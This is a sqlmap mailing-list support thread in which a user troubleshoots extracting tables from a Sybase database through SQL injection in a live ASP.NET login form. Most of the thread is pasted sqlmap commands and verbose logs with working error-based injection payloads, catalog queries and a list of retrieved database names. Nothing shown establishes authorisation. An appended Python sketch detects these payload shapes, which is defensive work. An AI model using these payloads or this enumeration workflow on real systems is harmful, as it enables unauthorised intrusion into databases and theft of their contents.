Re: [sqlmap-users] sqlmap with Sybase
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:59:58
Strange thing is that you are not getting anything with --parse-errors as you are dealing with a "missing database" problem inlined with error-based technique.

Can you please send a traffic file (if you want you can send it privately to me) for that same run (where you've used --parse-errors)?

Bye

On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <rwh...@gm...> wrote:

> Sure. The --parse-errors switch doesn't seem to produce anything
> additional? I added -v3 just in case.
>
> --
> $ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
> --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3
>
> sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 14:46:47
>
> [14:46:47] [DEBUG] cleaning up configuration parameters
> [14:46:47] [DEBUG] setting the HTTP timeout
> [14:46:47] [DEBUG] setting the HTTP method to POST
> [14:46:47] [DEBUG] creating HTTP requests opener object
> [14:46:47] [DEBUG] forcing back-end DBMS to user defined value
> [14:46:47] [INFO] testing connection to the target URL
> [14:46:47] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: ...
> Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
> ---
> [14:46:47] [INFO] testing Sybase
> [14:46:47] [PAYLOAD] rw8...@gm...' AND 6746=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
> (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
> [14:46:48] [WARNING] reflective value(s) found and filtering out
> [14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
> [14:46:48] [INFO] confirming Sybase
> [14:46:48] [PAYLOAD] rw8...@gm...' AND 6332=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
> (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
> [14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
> [14:46:48] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
> [14:46:48] [PAYLOAD] rw8...@gm...' AND 5371=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT
> ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM
> ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS
> Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
> [14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
> [14:46:49] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> No tables found
> [14:46:49] [INFO] fetched data logged to text files under
> '/opt/sqlmap/output/xxx'
>
> [*] shutting down at 14:46:49
> --
>
> $ python sqlmap.py ... --dbs
>
> [14:50:13] [INFO] testing Sybase
> [14:50:14] [WARNING] reflective value(s) found and filtering out
> [14:50:14] [INFO] confirming Sybase
> [14:50:14] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:50:14] [INFO] fetching database names
> [14:50:14] [INFO] retrieved: 13
> [14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
> [14:50:15] [INFO] retrieved: 13
> [14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row
> data
> [14:50:15] [INFO] retrieved: AR1
> [14:50:16] [INFO] retrieved: AR10
> [14:50:16] [INFO] retrieved: AR100TST
> [14:50:17] [INFO] retrieved: AR15
> [14:50:17] [INFO] retrieved: AR710
> [14:50:18] [INFO] retrieved: AR710TST
> [14:50:18] [INFO] retrieved: ENERGY_MASTER
> [14:50:19] [INFO] retrieved: master
> [14:50:20] [INFO] retrieved: model
> [14:50:20] [INFO] retrieved: olympus
> [14:50:21] [INFO] retrieved: sybsystemdb
> [14:50:21] [INFO] retrieved: sybsystemprocs
> [14:50:22] [INFO] retrieved: tempdb
>
> On 25 March 2014 14:22, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> Can you please copy/paste the console output you get for sqlmap run with:
>>
>> python sqlmap.py ... -D ENERGY --tables --parse-errors
>>
>> Also, for:
>>
>> python sqlmap.py ... --dbs
>>
>> Bye
>> On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote:
>>
>>> Hi all,
>>>
>>> I'm running into trouble with sqlmap against a Sybase db. Here's the
>>> fingerprint:
>>>
>>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
>>> Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
>>>
>>> The technique I'm using is error-based through a POST to a vulnerable
>>> .aspx page. I am able to enumerate the master db, but not the user tables,
>>> which are what I want.
>>>
>>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah"
>>> --dbms=sybase --threads=8 --batch --technique=E -D master --tables
>>>
>>> This produces 58 tables, mostly sys* and some mon* which seem standard.
>>> I can dump the sysobjects table using -D and -T, etc.
>>>
>>> The web app is querying a database we'll call "ENERGY". If I try to "-D
>>> ENERGY --tables", I get "No tables found, try using --hex or --no-cast
>>> blahblah" (which don't work).
>>>
>>> I used -v4 to look closely at the requests, and see sqlmap is prefixing
>>> the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after
>>> experimenting I found doesn't work, so I wrote a small tamper script to
>>> strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names
>>> from the user tables (type='U'), but I'm still not able to get at the
>>> actual data/rows in the tables.
>>>
>>> I know it must be possible because the web app is definitely querying
>>> the tables to validate a login (this is a sqli vuln in a login form, heh).
>>>
>>> I'm not even sure this is really a bug in sqlmap - maybe something odd
>>> in the way the database is built or something. I just thought I'd ask in
>>> case anyone has had success using sqlmap against a similar Sybase db and
>>> has some tips or suggestions.
>>>
>>> Thanks for reading - I can provide more information if anyone's
>>> interested.
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>

--
Miroslav Stampar
http://about.me/stamparm
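For defenders reading the log quoted above, the error-based vector has a recognisable shape in request data: a `CONVERT(INT,(SELECT ...))` wrapper, delimiter strings spelled as `CHAR(n)+CHAR(n)+...` chains, and references to catalog tables or `@@` globals. The following detection sketch is an added example, not part of the original thread and not sqlmap code; the function names are hypothetical, the sample values are constructed, and it assumes the logging layer has already URL-decoded the POST parameter values.

```python
import re

# Assumption: values are POST parameters already URL-decoded by the logging layer.
CONVERT_SELECT = re.compile(r"CONVERT\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)
CHAR_CHAIN = re.compile(r"(?:CHAR\(\s*\d{1,3}\s*\)\s*\+\s*){2,}CHAR\(\s*\d{1,3}\s*\)", re.I)
CATALOG = re.compile(r"\bsys(?:objects|databases|columns)\b|@@\w+|\bsuser_id\(\)", re.I)

def decode_char_chains(value):
    """Rewrite CHAR(n)+CHAR(n)+... chains as the quoted string they spell."""
    def spell(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_CHAIN.sub(spell, value)

def indicators(value):
    """Return the names of the error-based injection traits present in value."""
    found = []
    if CONVERT_SELECT.search(value):
        found.append("convert-int-subquery")
    if CHAR_CHAIN.search(value):
        found.append("char-chain-delimiter")
    if CATALOG.search(value):
        found.append("catalog-or-global")
    return found

def triage(values):
    """Flag values with the CONVERT(INT,(SELECT ...)) shape plus one more trait."""
    alerts = []
    for value in values:
        found = indicators(value)
        if "convert-int-subquery" in found and len(found) >= 2:
            alerts.append({"traits": found, "decoded": decode_char_chains(value)})
    return alerts

# Constructed sample values, modelled on the payload shapes in the log above.
SAMPLES = [
    "alice@example.test",
    "please convert my account to INT pricing",
    "user@example.test' AND 6746=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(104)"
    "+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (@@transtate=@@transtate) THEN CHAR(49)"
    " ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113)))"
    " AND 'eeea'='eeea",
]

if __name__ == "__main__":
    for alert in triage(SAMPLES):
        print(alert["traits"], alert["decoded"])
```

Decoding the chains before an analyst reads the alert exposes the random delimiter pair around the subquery, which is also what to search for in the application's error responses.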